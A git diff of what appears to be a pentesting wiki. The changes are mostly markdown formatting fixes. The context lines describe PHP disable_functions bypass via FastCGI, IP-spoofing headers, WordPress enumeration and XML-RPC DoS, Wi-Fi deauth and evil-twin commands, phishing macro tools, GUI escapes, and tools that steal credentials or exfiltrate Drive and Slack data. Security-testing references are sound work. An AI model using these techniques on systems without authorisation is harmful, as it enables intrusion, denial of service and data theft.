5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md) +* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md) +* [**Bypass via mem**](disable\_functions-bypass-via-mem.md) +* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md) +* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md) ### **ALL IN ONE** diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md index efae7dc5..4485c6df 100644 --- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md +++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md @@ -13,7 +13,7 @@ Normally web pages, files and all of the documents which are transferred from th If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client. -For example, when the CGI script [http://mysitename.com/\*\*cgi-bin/file.pl\*\*](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)) +For example, when the CGI script [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)) ### FastCGI @@ -28,7 +28,7 @@ It's possible to run PHP code abusing the FastCGI and avoiding the `disable_func ### Via Gopherus {% hint style="danger" %} -I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.\*\* +I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via \[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.** {% endhint %} Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands: @@ -47,7 +47,7 @@ Uploading and accessing this script the exploit is going to be sent to FastCGI ( ### PHP exploit {% hint style="danger" %} -I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP (somehow) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.\*\* +I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP (somehow) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via \[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.** {% endhint %} ```php @@ -411,7 +411,7 @@ Using the previous function you will see that the function **`system`** is **sti **So, I think that you can only set `disable_functions` via php `.ini` config files and the PHP_VALUE won't override that setting.** -### \*\*\*\*[**FuckFastGCI**](https://github.com/w181496/FuckFastcgi)\*\*\*\* +### [**FuckFastGCI**](https://github.com/w181496/FuckFastcgi) This is a php script to exploit fastcgi protocol to bypass `open_basedir` and `disable_functions`.\ It will help you to bypass strict `disable_functions` to RCE by loading the malicious extension.\ diff --git a/pentesting/pentesting-web/put-method-webdav.md b/pentesting/pentesting-web/put-method-webdav.md index 37f0d23f..e6b578a2 100644 --- a/pentesting/pentesting-web/put-method-webdav.md +++ b/pentesting/pentesting-web/put-method-webdav.md @@ -72,7 +72,7 @@ ServerAdmin webmaster@localhost Require valid-user ``` -As you can see there is the files with the valid **credentials** for the **webdav** server: +As you can see there is the files with the valid **credentials** for the **webdav** server: ``` /etc/apache2/users.password diff --git a/pentesting/pentesting-web/special-http-headers.md b/pentesting/pentesting-web/special-http-headers.md index 496e16a2..fa8fe23c 100644 --- a/pentesting/pentesting-web/special-http-headers.md +++ b/pentesting/pentesting-web/special-http-headers.md @@ -8,12 +8,12 @@ Rewrite **IP source**: -* `X-Originating-IP: 127.0.0.1` +* `X-Originating-IP: 127.0.0.1` * `X-Forwarded-For: 127.0.0.1` * `X-Forwarded: 127.0.0.1` * `Forwarded-For: 127.0.0.1` * `X-Forwarded-Host: 127.0.0.1` -* `X-Remote-IP: 127.0.0.1` +* `X-Remote-IP: 127.0.0.1` * `X-Remote-Addr: 127.0.0.1` * `X-ProxyUser-Ip: 127.0.0.1` * `X-Original-URL: 127.0.0.1` @@ -56,7 +56,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b * **`X-Cache`** in the response may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached * **`Cache-Control`** indicates if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800` -* **`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. +* **`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. * **`Age`** defines the times in seconds the object has been in the proxy cache. {% content-ref url="../../pentesting-web/cache-deception.md" %} @@ -92,7 +92,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b * **`Content-Location`**: Indicates an alternate location for the returned data. From a pentest point of view this information is usually "useless", but if the resource is **protected** by a 401 or 403 and you can find some **way** to **get** this **info**, this could be **interesting.** \ -****For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests: +For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests: * A request with the header `Range: bytes=20-20` and with a response containing `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` is leaking that the SHA1 of the byte 20 is `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y` diff --git a/pentesting/pentesting-web/symphony.md b/pentesting/pentesting-web/symphony.md index e6924785..b7326c29 100644 --- a/pentesting/pentesting-web/symphony.md +++ b/pentesting/pentesting-web/symphony.md @@ -507,7 +507,7 @@ _Sample output using `Inline::parse` with a serialized payload_ The exploit will therefore run through every possible variable combination, and then try out the two exploitation methods. The code is available on [our GitHub](https://github.com/ambionics/symfony-exploits). -## Accessing symphony /\_profiler information +## Accessing symphony /\_profiler information ![f:id:flattsecurity:20201021204553p:plain](https://cdn-ak.f.st-hatena.com/images/fotolife/f/flattsecurity/20201021/20201021204553.png) @@ -535,6 +535,6 @@ You should also check these URLs: ## References -* [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)**** -* [**https://flattsecurity.hatenablog.com/entry/2020/11/02/124807**](https://flattsecurity.hatenablog.com/entry/2020/11/02/124807)**** -* ****[**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)**** +* [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment) +* [**https://flattsecurity.hatenablog.com/entry/2020/11/02/124807**](https://flattsecurity.hatenablog.com/entry/2020/11/02/124807) +* [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144) diff --git a/pentesting/pentesting-web/uncovering-cloudflare.md b/pentesting/pentesting-web/uncovering-cloudflare.md index 325139ec..53497c4b 100644 --- a/pentesting/pentesting-web/uncovering-cloudflare.md +++ b/pentesting/pentesting-web/uncovering-cloudflare.md @@ -2,8 +2,8 @@ Techniques to try to uncover web servers behind cloudflare: -* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) +* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) * Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/) -* ****[**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs. +* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs. * You can also use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before. * If you find a **SSRF inside the web application** you can abuse it to obtain the IP address of the server. diff --git a/pentesting/pentesting-web/web-api-pentesting.md b/pentesting/pentesting-web/web-api-pentesting.md index 216dc570..a9a84262 100644 --- a/pentesting/pentesting-web/web-api-pentesting.md +++ b/pentesting/pentesting-web/web-api-pentesting.md @@ -10,11 +10,11 @@ Main: * An example of this documentation can be found in [http://www.dneonline.com/calculator.asmx](http://www.dneonline.com/calculator.asmx) (WSDL document in [http://www.dneonline.com/calculator.asmx?wsdl](http://www.dneonline.com/calculator.asmx?wsdl)) and you can see an example request calling the `Add` method in [http://www.dneonline.com/calculator.asmx?op=Add](http://www.dneonline.com/calculator.asmx?op=Add) * For parsing these files and create example requests you and use the tool **SOAPUI** or the **WSDLer** Burp Suite Extension. - + * **REST APIs (JSON)** * The standard documentation is the WADL file. Find an example here: [https://www.w3.org/Submission/wadl/](https://www.w3.org/Submission/wadl/). However, there are other more developer friendly API representation engines like [https://swagger.io/tools/swagger-ui/](https://swagger.io/tools/swagger-ui/) (check the demo in the page) * For parsing these files and create example requests you an use the tool **Postman** -* ****[**GraphQL**](graphql.md)**** +* [**GraphQL**](graphql.md) ## Tricks @@ -54,13 +54,13 @@ You could **replace** the **`album_id`** parameter with something completely dif ### Parameter pollution - /api/account?**id=\** → /api/account?**id=\\&id=\** +/api/account?**id=\** → /api/account?**id=\\&id=\** ### Wildcard parameter Try to use the following symbols as wildcards: **\***, **%**, **\_**, **.** -* /api/users/\* +* /api/users/\* * /api/users/% * /api/users/\_ * /api/users/. @@ -108,8 +108,8 @@ Old versions may be still be in use and be more vulnerable than latest endpoints * `/api/v1/login` * `/api/v2/login`\ -* `/api/CharityEventFeb2020/user/pp/` -* `/api/CharityEventFeb2021/user/pp/` +* `/api/CharityEventFeb2020/user/pp/` +* `/api/CharityEventFeb2021/user/pp/` ## Owasp API Security Top 10 @@ -125,7 +125,7 @@ Read this document to learn how to **search** and **exploit** Owasp Top 10 API v ## Tools -* ****[**https://github.com/imperva/automatic-api-attack-tool**](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output. +* [**https://github.com/imperva/automatic-api-attack-tool**](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output. * [**https://github.com/microsoft/restler-fuzzer**](https://github.com/microsoft/restler-fuzzer): RESTler is the _first stateful REST API fuzzing tool_ for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. For a given cloud service with an OpenAPI/Swagger specification, RESTler analyzes its entire specification, and then generates and executes tests that exercise the service through its REST API. -* ****[**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing -* ****[**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints** +* [**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing +* [**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints** diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index a7ce30c4..64b5545b 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -3,7 +3,7 @@ ## Basic Information **Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\ -\_\_**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in\*\*:\*\* [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ +\_\_**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) In **wp-config.php** you can find the root password of the database. @@ -103,7 +103,7 @@ curl http://blog.example.com/wp-json/wp/v2/users **Only information about the users that has this feature enable will be provided**. -Also note that _**/wp-json/wp/v2/pages** could leak IP addresses\*\*.\*\*_ +Also note that _**/wp-json/wp/v2/pages** could leak IP addresses**.**_ ### XML-RPC @@ -165,7 +165,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. -Take a look to the use of \*\*`system.multicall`\*\*in the previous section to learn how to abuse this method to cause DDoS. +Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS. ### wp-cron.php DoS @@ -386,4 +386,4 @@ Also, **only install trustable WordPress plugins and themes**. * **Limit login attempts** to prevent Brute Force attacks * Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses. -## \*\*\*\* +## diff --git a/pentesting/pentesting-wifi/README.md b/pentesting/pentesting-wifi/README.md index 0f6d9e66..9f4e26bc 100644 --- a/pentesting/pentesting-wifi/README.md +++ b/pentesting/pentesting-wifi/README.md @@ -74,7 +74,7 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically: ## Attacks Summary -* **DoS** +* **DoS** * Deauthentication/disassociation -- Disconnect everyone (or a specific ESSID/Client) * Random fake APs -- Hide nets, possible crash scanners * Overload AP -- Try to kill the AP (usually not very useful) @@ -190,7 +190,7 @@ mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l] **ATTACK MODE s: Attacks for IEEE 802.11s mesh networks** -Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic! +Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic! **ATTACK MODE w: WIDS Confusion** @@ -616,7 +616,7 @@ hostapd-wpe ./victim/victim.conf -s In the configuration file you can select a lot of different things like ssid, channel, user files, cret/key, dh parameters, wpa version and auth... -[**Using hostapd-wpe with EAP-TLS to allow any certificate to login.**](evil-twin-eap-tls.md)**** +[**Using hostapd-wpe with EAP-TLS to allow any certificate to login.**](evil-twin-eap-tls.md) #### Using EAPHammer diff --git a/pentesting/pentesting-wifi/evil-twin-eap-tls.md b/pentesting/pentesting-wifi/evil-twin-eap-tls.md index 66de9d5e..404b7c28 100644 --- a/pentesting/pentesting-wifi/evil-twin-eap-tls.md +++ b/pentesting/pentesting-wifi/evil-twin-eap-tls.md @@ -6,7 +6,7 @@ You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](h ## Evil Twin for EAP-TLS -**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)**** +**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) ### The Uncommon Case: Attacking EAP-TLS diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md index 93b8adec..c80347ff 100644 --- a/phishing-methodology/README.md +++ b/phishing-methodology/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/phishing-methodology/phishing-documents.md b/phishing-methodology/phishing-documents.md index f1b4a711..85ba5bce 100644 --- a/phishing-methodology/phishing-documents.md +++ b/phishing-methodology/phishing-documents.md @@ -48,5 +48,5 @@ The more common they are, the more probable the AV will detect it. ### MacOS -* ****[**macphish**](https://github.com/cldrn/macphish)**** -* ****[**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)**** +* [**macphish**](https://github.com/cldrn/macphish) +* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/physical-attacks/escaping-from-gui-applications/README.md index 91b1f74c..ab5a4cbc 100644 --- a/physical-attacks/escaping-from-gui-applications/README.md +++ b/physical-attacks/escaping-from-gui-applications/README.md @@ -26,7 +26,7 @@ Maybe **using a **_**Open with**_** option** you can open/execute some kind of s For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io) -#### \*NIX __ +#### \*NIX __ _bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.github.io) @@ -75,27 +75,27 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef ### ShortCuts -* Sticky Keys – Press SHIFT 5 times -* Mouse Keys – SHIFT+ALT+NUMLOCK -* High Contrast – SHIFT+ALT+PRINTSCN -* Toggle Keys – Hold NUMLOCK for 5 seconds -* Filter Keys – Hold right SHIFT for 12 seconds -* WINDOWS+F1 – Windows Search -* WINDOWS+D – Show Desktop -* WINDOWS+E – Launch Windows Explorer -* WINDOWS+R – Run -* WINDOWS+U – Ease of Access Centre -* WINDOWS+F – Search -* SHIFT+F10 – Context Menu -* CTRL+SHIFT+ESC – Task Manager -* CTRL+ALT+DEL – Splash screen on newer Windows versions -* F1 – Help F3 – Search -* F6 – Address Bar -* F11 – Toggle full screen within Internet Explorer -* CTRL+H – Internet Explorer History -* CTRL+T – Internet Explorer – New Tab -* CTRL+N – Internet Explorer – New Page -* CTRL+O – Open File +* Sticky Keys – Press SHIFT 5 times +* Mouse Keys – SHIFT+ALT+NUMLOCK +* High Contrast – SHIFT+ALT+PRINTSCN +* Toggle Keys – Hold NUMLOCK for 5 seconds +* Filter Keys – Hold right SHIFT for 12 seconds +* WINDOWS+F1 – Windows Search +* WINDOWS+D – Show Desktop +* WINDOWS+E – Launch Windows Explorer +* WINDOWS+R – Run +* WINDOWS+U – Ease of Access Centre +* WINDOWS+F – Search +* SHIFT+F10 – Context Menu +* CTRL+SHIFT+ESC – Task Manager +* CTRL+ALT+DEL – Splash screen on newer Windows versions +* F1 – Help F3 – Search +* F6 – Address Bar +* F11 – Toggle full screen within Internet Explorer +* CTRL+H – Internet Explorer History +* CTRL+T – Internet Explorer – New Tab +* CTRL+N – Internet Explorer – New Page +* CTRL+O – Open File * CTRL+S – Save CTRL+N – New RDP / Citrix ### Swipes diff --git a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md index efebe2a6..66834c4b 100644 --- a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md +++ b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md @@ -41,4 +41,4 @@ That's it. You should now be able to see the true extensions of the files in you Copyright © 2008-2018 by Christopher Heng. All rights reserved. Get more "How To" guides and tutorials from [https://www.howtohaven.com/](https://www.howtohaven.com). -**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)**** +**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml) diff --git a/physical-attacks/firmware-analysis/README.md b/physical-attacks/firmware-analysis/README.md index abdf41f1..c9da7b23 100644 --- a/physical-attacks/firmware-analysis/README.md +++ b/physical-attacks/firmware-analysis/README.md @@ -158,9 +158,9 @@ Some **interesting things to look** for inside the firmware: Tools that search for this kind of information (even if you always should take a manual look and get comfortable with the filesystem structure, the tools can help you finding **hidden things**): -* ****[**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** Awesome bash script that in this case is useful for searching **sensitive information** inside the filesystem. Just **chroot inside the firmware filesystem and run it**. -* ****[**Firmwalker**](https://github.com/craigz28/firmwalker)**:** Bash script to search for potential sensitive information -* ****[**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core): +* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** Awesome bash script that in this case is useful for searching **sensitive information** inside the filesystem. Just **chroot inside the firmware filesystem and run it**. +* [**Firmwalker**](https://github.com/craigz28/firmwalker)**:** Bash script to search for potential sensitive information +* [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core): * Identification of software components such as operating system, CPU architecture, and third-party components along with their associated version information * Extraction of firmware filesystem (s ) from images * Detection of certificates and private keys @@ -172,9 +172,9 @@ Tools that search for this kind of information (even if you always should take a * Detection of binary mitigations such as NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY\_SOURCE * REST API * and more... -* ****[**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzer is a tool to analyze (ext2/3/4), FAT/VFat, SquashFS, UBIFS filesystem images, cpio archives, and directory content using a set of configurable rules. -* ****[**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): A Free Software IoT Firmware Security Analysis Tool -* ****[**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): This is a complete rewrite of the original ByteSweep project in Go. +* [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzer is a tool to analyze (ext2/3/4), FAT/VFat, SquashFS, UBIFS filesystem images, cpio archives, and directory content using a set of configurable rules. +* [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): A Free Software IoT Firmware Security Analysis Tool +* [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): This is a complete rewrite of the original ByteSweep project in Go. {% hint style="warning" %} Inside the filesystem you can also find **source code** of programs (that you should always **check**), but also **compiled binaries**. These programs might be somehow exposed and you should **decompile** and **check** them for potential vulnerabilities. @@ -234,11 +234,11 @@ There are several tools, based in **qemu** in general, that will allow you to em * [**https://github.com/firmadyne/firmadyne**](https://github.com/firmadyne/firmadyne)**:** * You need to install several things, configure postgres, then run the extractor.py script to extract the firmware, use the getArch.sh script to get the architecture. Then, use tar2db.py and makeImage.sh scripts to store information from the extracted image in the database and generate a QEMU image that we can emulate. The, use inferNetwork.sh script to get the network interfaces, and finally use the run.sh script, which is automatically created in the ./scratch/1/folder. -* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:** - * This tool depends on firmadyne and automates the process of emulating the firmware using firmadynee. you need to configure `fat.config` before using it: `sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0` -* ****[**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux)**** -* ****[**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X)**** -* ****[**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) +* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:** + * This tool depends on firmadyne and automates the process of emulating the firmware using firmadynee. you need to configure `fat.config` before using it: `sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0` +* [**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux) +* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) +* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) ## **Dynamic analysis** @@ -301,8 +301,8 @@ Utilize the following references for further guidance: ## Prepared OSs to analyze Firmware -* ****[**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. -* ****[**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. +* [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. +* [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. ## Vulnerable firmware to practice diff --git a/post-exploitation.md b/post-exploitation.md index 1fad8ccc..36254e20 100644 --- a/post-exploitation.md +++ b/post-exploitation.md @@ -2,16 +2,16 @@ ### **Local l00t** -* ****[**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem. -* ****[**LaZagne**](https://github.com/AlessandroZ/LaZagne): The **LaZagne project** is an open source application used to **retrieve lots of passwords** stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. +* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem. +* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): The **LaZagne project** is an open source application used to **retrieve lots of passwords** stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. ### **External Services** -* ****[**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to. -* ****[**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to. -* ****[**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API. -* ****[**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token. -* ****[**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review. +* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to. +* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to. +* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API. +* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token. +* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack 